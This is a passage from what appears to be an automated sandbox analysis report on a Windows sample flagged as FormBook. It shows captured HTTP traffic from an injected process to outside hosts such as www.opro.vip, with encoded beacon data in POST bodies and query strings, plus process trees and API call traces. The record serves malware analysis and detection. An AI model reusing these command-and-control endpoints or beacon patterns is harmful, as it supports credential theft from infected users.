2f 6d 75 45 56 58 75 33 52 59 69 68 63 56 4c 43 5a 5a 4a 37 68 6c 46 6d 4b 59 36 35 2b 51 74 57 44 4d 58 73 6c 61 31 75 52 71 34 5a 46 45 58 56 31 45 70 4b 32 5a 73 38 67 38 65 61 31 34 2b 35 70 35 70 47 62 6f 52 2b 70 74 55 4a 41 77 79 65 4a 48 57 53 61 6d 5a 73 37 67 63 52 64 6a 41 59 31 34 7a 66 6d 73 31 54 71 76 76 38 2f 6e 74 62 71 2b 73 5a 73 68 4f 43 79 41 61 31 74 36 73 50 54 4d 69 73 71 42 75 59 39 32 47 78 68 32 6a 41 71 6f 65 51 4d 70 2f 6c 2f 75 78 71 64 32 4d 42 67 38 4b 4f 57 7a 34 6e 37 41 49 30 43 6e 67 52 55 68 36 4c 38 58 49 62 73 51 50 6c 64 74 78 67 75 35 4e 55 43 39 71 44 61 6c 47 75 6d 39 38 4e 44 63 41 6e 58 6b 75 47 4e 67 78 61 78 38 2b 6c 31 32 74 6d 51 53 45 62 63 36 7a 62 6b 57 4a 75 71 49 43 72 33 79 43 61 59 41 44 55 58 43 34 52 47 6b 4f 73 4f 74 47 4d 41 77 2f 61 33 47 36 66 44 6b 4b 6d 58 4a 47 54 41 46 2f 49 75 31 47 38 37 55 52 2b 67 42 47 33 6e [TRUNCATED] Data Ascii: rVu4SxF=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3RYihcVLCZZJ7hlFmKY65+QtWDMXsla1uRq4ZFEXV1EpK2Zs8g8ea14+5p5pGboR+ptUJAwyeJHWSamZs7gcRdjAY14zfms1Tqvv8/ntbq+sZshOCyAa1t6sPTMisqBuY92Gxh2jAqoeQMp/l/uxqd2MBg8KOWz4n7AI0CngRUh6L8XIbsQPldtxgu5NUC9qDalGum98NDcAnXkuGNgxax8+l12tmQSEbc6zbkWJuqICr3yCaYADUXC4RGkOsOtGMAw/a3G6fDkKmXJGTAF/Iu1G87UR+gBG3ngBOFSN3nmNujH91qdF4r0ewnkLBQPsZDUv5wT7pUfPMdDcVohTLD8ltbYYX47Cjb+7apJR9oDpBtNvHprpMdCKyLsKjJ/Q6h2KT6i7oZ+0jYu6i/szFW2YcVzUt4ZIbtWOySLu35P4ymaHZcvhmND5640hqwwBBGeSu2ayEMVqzQR6y/O0RnNa+2okFkUIZUTyPeVkyAhCDS95RW3UBI4TTolWRIrkFixovEXKP+7fOPW3PrtmcmaGkNQ4J8wt1W9EVZE5YJ3jnXTlpoSZyCer5yGQZkEexw0A+GVlkYEFmLESYUAKnDJF+G3T3jRl1S9nsjBFhzTetwUvG0HpxebYRAMvlY8FRJmhfGEFyIR0zawzAaBHtc1jkVXpLy7ER3zwU0rjvmjCwM9vH7Dn/oCq4zHV49G6yz3B2rCXyRbP0xfzRyW8U2BHR/bOXsmsKygY6c0of1Mp30JeDgnEMkr6qvDCHM43xQSecTh42e55zENbnbKzL24HU3qvR1V792ZeF1K9avuegpGzEDaVQVh2LELKO/2Su0tqg8DHXbwrRLhDD8Cag1tkVOhx3/gIB0Wj5KrGCvet5X4X8In7T+++N99wlNcS2GJyb1PFkw6uE2cuQMXhZ2G1nEJjtOPDo1V6MFBBnVwgEICpDv/PTkkSus8lyNiDF3NG [TRUNCATED]
Jan 10, 2025 20:26:40.397304058 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:40 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	55736	69.57.163.64	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:42.373143911 CET	462	OUT	GET /9er8/?rVu4SxF=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaMHx03gUwA2Avn+NiKPlzkrwvOlggCg==&JXYh=X6eL8Vp0 HTTP/1.1 Host: www.startsomething.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:26:42.949148893 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:42 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	55737	170.33.13.246	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:48.405288935 CET	707	OUT	POST /3oq9/ HTTP/1.1 Host: www.opro.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 196 Connection: close Origin: http://www.opro.vip Referer: http://www.opro.vip/3oq9/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 66 34 66 38 30 6b 7a 42 6d 6b 33 58 51 6b 2b 75 62 2b 55 34 48 71 4a 2f 4b 79 64 6e 63 70 46 6b 4e 6d 34 49 74 55 37 42 50 52 75 51 69 45 51 31 76 4c 6c 79 61 74 72 35 48 59 76 36 51 68 43 63 6d 71 4e 67 54 65 4f 56 68 36 55 45 6f 42 38 6c 2f 78 6f 39 4d 4f 2f 47 44 54 65 42 6d 49 7a 6a 6b 5a 30 62 53 4b 54 2f 79 7a 41 4a 70 67 65 61 76 78 4a 59 6a 37 4d 65 63 34 32 33 42 38 61 34 47 34 31 6c 38 64 30 32 71 39 63 39 4e 51 63 43 70 68 73 76 62 6e 77 75 56 4e 48 4b 75 68 6c 4c 6e 4e 75 2f 69 56 46 44 65 45 54 51 74 45 30 32 Data Ascii: rVu4SxF=7OhtZpOFOJnuf4f80kzBmk3XQk+ub+U4HqJ/KydncpFkNm4ItU7BPRuQiEQ1vLlyatr5HYv6QhCcmqNgTeOVh6UEoB8l/xo9MO/GDTeBmIzjkZ0bSKT/yzAJpgeavxJYj7Mec423B8a4G41l8d02q9c9NQcCphsvbnwuVNHKuhlLnNu/iVFDeETQtE02
Jan 10, 2025 20:26:49.424448967 CET	150	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:49 GMT Content-Type: text/html Content-Length: 419 Connection: close ETag: "6642ecf7-1a3"
Jan 10, 2025 20:26:49.425134897 CET	419	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	55738	170.33.13.246	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:50.967348099 CET	731	OUT	POST /3oq9/ HTTP/1.1 Host: www.opro.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 220 Connection: close Origin: http://www.opro.vip Referer: http://www.opro.vip/3oq9/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 63 5a 76 38 32 44 6e 42 68 45 33 55 4a 45 2b 75 53 65 55 38 48 71 46 2f 4b 7a 5a 33 63 66 74 6b 49 33 49 49 73 51 58 42 49 52 75 51 73 6b 51 77 72 4c 6c 39 61 74 75 4f 48 64 50 36 51 6c 69 63 6d 72 64 67 54 74 6d 55 75 4b 55 38 78 52 38 6a 37 78 6f 39 4d 4f 2f 47 44 54 36 72 6d 49 72 6a 6b 4a 6b 62 54 75 50 34 38 54 41 4f 75 67 65 61 72 78 4a 63 6a 37 4e 37 63 36 53 4a 42 36 65 34 47 38 78 6c 38 49 55 78 7a 4e 63 2f 53 67 64 41 70 79 31 44 55 46 51 71 4c 61 33 4f 2b 58 41 33 6b 73 53 68 7a 6e 4d 59 4c 54 54 33 71 6a 39 65 69 6b 33 4f 55 39 75 47 35 47 32 30 39 46 32 6f 41 35 4e 75 34 77 3d 3d Data Ascii: rVu4SxF=7OhtZpOFOJnucZv82DnBhE3UJE+uSeU8HqF/KzZ3cftkI3IIsQXBIRuQskQwrLl9atuOHdP6QlicmrdgTtmUuKU8xR8j7xo9MO/GDT6rmIrjkJkbTuP48TAOugearxJcj7N7c6SJB6e4G8xl8IUxzNc/SgdApy1DUFQqLa3O+XA3ksShznMYLTT3qj9eik3OU9uG5G209F2oA5Nu4w==
Jan 10, 2025 20:26:51.754992962 CET	150	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:51 GMT Content-Type: text/html Content-Length: 419 Connection: close ETag: "6642ed07-1a3"
Jan 10, 2025 20:26:51.756968021 CET	419	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.9	55739	170.33.13.246	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:53.971945047 CET	1744	OUT	POST /3oq9/ HTTP/1.1 Host: www.opro.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1232 Connection: close Origin: http://www.opro.vip Referer: http://www.opro.vip/3oq9/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 63 5a 76 38 32 44 6e 42 68 45 33 55 4a 45 2b 75 53 65 55 38 48 71 46 2f 4b 7a 5a 33 63 66 56 6b 49 6c 41 49 74 33 44 42 4a 52 75 51 6b 45 51 78 72 4c 6c 61 61 70 43 4b 48 64 4c 45 51 6e 61 63 6e 4a 46 67 52 63 6d 55 31 61 55 38 73 42 38 6d 2f 78 70 67 4d 4e 58 43 44 54 71 72 6d 49 72 6a 6b 50 49 62 54 36 54 34 73 6a 41 4a 70 67 65 47 76 78 4a 30 6a 37 6b 47 63 36 47 5a 42 4c 69 34 47 63 68 6c 36 38 30 78 73 39 63 35 54 67 64 69 70 79 4a 63 55 46 4d 6d 4c 66 69 72 2b 51 73 33 31 34 33 42 32 54 38 6b 4a 53 76 45 6e 6b 64 5a 6b 79 54 38 56 63 32 44 75 58 69 53 71 57 44 52 45 61 4d 77 69 66 70 50 67 51 48 74 7a 58 78 62 6a 69 32 4f 62 37 71 2b 76 6d 2b 63 47 66 4e 32 64 4e 51 4c 44 42 4c 46 46 4b 4d 4d 70 46 4d 73 4d 2b 4c 72 6f 49 72 4d 43 59 69 6f 6c 75 6d 42 68 4c 55 7a 54 70 6d 45 49 77 46 4b 37 57 48 43 61 64 79 36 6d 54 53 48 65 59 2b 68 46 2f 68 74 53 4a 64 4e 52 6c 38 58 4b 36 56 52 65 73 73 6e 71 75 54 69 54 38 4d 69 47 53 5a 66 49 61 [TRUNCATED] Data Ascii: rVu4SxF=7OhtZpOFOJnucZv82DnBhE3UJE+uSeU8HqF/KzZ3cfVkIlAIt3DBJRuQkEQxrLlaapCKHdLEQnacnJFgRcmU1aU8sB8m/xpgMNXCDTqrmIrjkPIbT6T4sjAJpgeGvxJ0j7kGc6GZBLi4Gchl680xs9c5TgdipyJcUFMmLfir+Qs3143B2T8kJSvEnkdZkyT8Vc2DuXiSqWDREaMwifpPgQHtzXxbji2Ob7q+vm+cGfN2dNQLDBLFFKMMpFMsM+LroIrMCYiolumBhLUzTpmEIwFK7WHCady6mTSHeY+hF/htSJdNRl8XK6VRessnquTiT8MiGSZfIahd1u7h6FRT9isLbb+th1J/aopeMf6KLBP5FLzw+yQQAO35v3GmcfUTibRcC10bqFKir+OIfgZ8c3UyxpPWjcSQctQHnUVKx+L3JPqr0YJDzRv1cCtgyyHN/Oo3yaveD9FXHOmbJ0t83YBIiWZSZMbfR506/oz97F+Gb39CXXi3iXY1/5HIYjYtTrzyXL1B4HNAkUFl9rIp5DwOkpJP5Soxe0fK/AADAUvqyxHYq/hw2aDhAxc+sggeCFjcDQ9uy/+z/wcBH0ULpsosoOO+qcY6DgfhKFfJObUw2bXbouD0KfKJc/rsKBYPr7/z+cOsQiZyqXUVf5TJea7zHlqPBU+14oloRxOdx1t0sPT6EJXJlTixcl60dmu/234IvzebWH10asLP59Nr3pkVa4ToG97Uhrchc0qbmo+Pz270jzWqnxYY8fZhlic0i1LPXnI2yZtDDNz4O+nFeUfiY+DKpKsRNyRXTqR+RsXk1+trW7eiffqwoKbMuVzgmjuhx5tYxQmo8qkhFOKHHIaJoRfVapG63gGehXLyMPpq8M43Oq9bGlFhFtM0YhumnGZc/g5qWcrzJcSi7uUPHhm77Rxtwf4YCbjblBpRVvSBH+jyQYU6daB0Xj6MFstd6A18JDJzaRUKnoU85zOscEbNFMWuD1YY3gGwXhJtuhN4 [TRUNCATED]
Jan 10, 2025 20:26:54.785238028 CET	569	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:54 GMT Content-Type: text/html Content-Length: 419 Connection: close ETag: "6642ed07-1a3" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 3c 74 69 74 6c 65 3e e5 9f 9f e5 90 8d e5 94 ae e5 8d 96 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 6e 61 6d 65 74 72 61 64 65 2f 64 6f 6d 61 69 6e 73 68 6f 77 3f 64 6f 6d 61 69 6e 3d 27 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 22 20 73 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<iframe src="https://wanwang.aliyun.com/nametrade/domainshow?domain='+window.location.hostname+'" style="width:100%;border:none;height:800px;"></iframe>')</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.9	55740	170.33.13.246	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:56.512717009 CET	452	OUT	GET /3oq9/?rVu4SxF=2MJNacGdKZTNHNzV3BrHuFLNQ1jOTMwdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHmiv8xn0odowBTH4/kOUn28Kur/JALIg==&JXYh=X6eL8Vp0 HTTP/1.1 Host: www.opro.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:26:57.365602970 CET	150	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:57 GMT Content-Type: text/html Content-Length: 419 Connection: close ETag: "6642ecf7-1a3"
Jan 10, 2025 20:26:57.366575956 CET	419	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra

Target ID:	0
Start time:	14:24:46
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\AuKUol8SPU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AuKUol8SPU.exe"
Imagebase:	0xb10000
File size:	1'182'208 bytes
MD5 hash:	7C5BC4B08A2079878CABA5453E2716A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:24:47
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AuKUol8SPU.exe"
Imagebase:	0x480000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1592353153.0000000006790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1596603872.00000000084A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1591098519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:25:02
Start date:	10/01/2025
Path:	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe"
Imagebase:	0x9a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2596411937.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:25:04
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\wiaacmgr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\wiaacmgr.exe"
Imagebase:	0x4b0000
File size:	84'480 bytes
MD5 hash:	2F1D379CE47E920BDDD2C50214457E0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2596615908.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2596676816.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2594866519.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:25:17
Start date:	10/01/2025
Path:	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe"
Imagebase:	0x9a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2598461928.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:25:28
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	161

Executed Functions

Function 00B13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B13B68
IsDebuggerPresent.KERNEL32 ref: 00B13B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00BD52F8,00BD52E0,?,?), ref: 00B13BEB

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

Part of subcall function 00B2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B13C14,00BD52F8,?,?,?), ref: 00B2096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00B13C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00BC7770,00000010), ref: 00B4D281
SetCurrentDirectoryW.KERNEL32(?,00BD52F8,?,?,?), ref: 00B4D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BC4260,00BD52F8,?,?,?), ref: 00B4D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00B4D346

Part of subcall function 00B13A46: GetSysColorBrush.USER32(0000000F), ref: 00B13A50
Part of subcall function 00B13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00B13A5F
Part of subcall function 00B13A46: LoadIconW.USER32(00000063), ref: 00B13A76
Part of subcall function 00B13A46: LoadIconW.USER32(000000A4), ref: 00B13A88
Part of subcall function 00B13A46: LoadIconW.USER32(000000A2), ref: 00B13A9A
Part of subcall function 00B13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B13AC0
Part of subcall function 00B13A46: RegisterClassExW.USER32(?), ref: 00B13B16

Part of subcall function 00B139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B13A03
Part of subcall function 00B139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B13A24
Part of subcall function 00B139D5: ShowWindow.USER32(00000000,?,?), ref: 00B13A38
Part of subcall function 00B139D5: ShowWindow.USER32(00000000,?,?), ref: 00B13A41

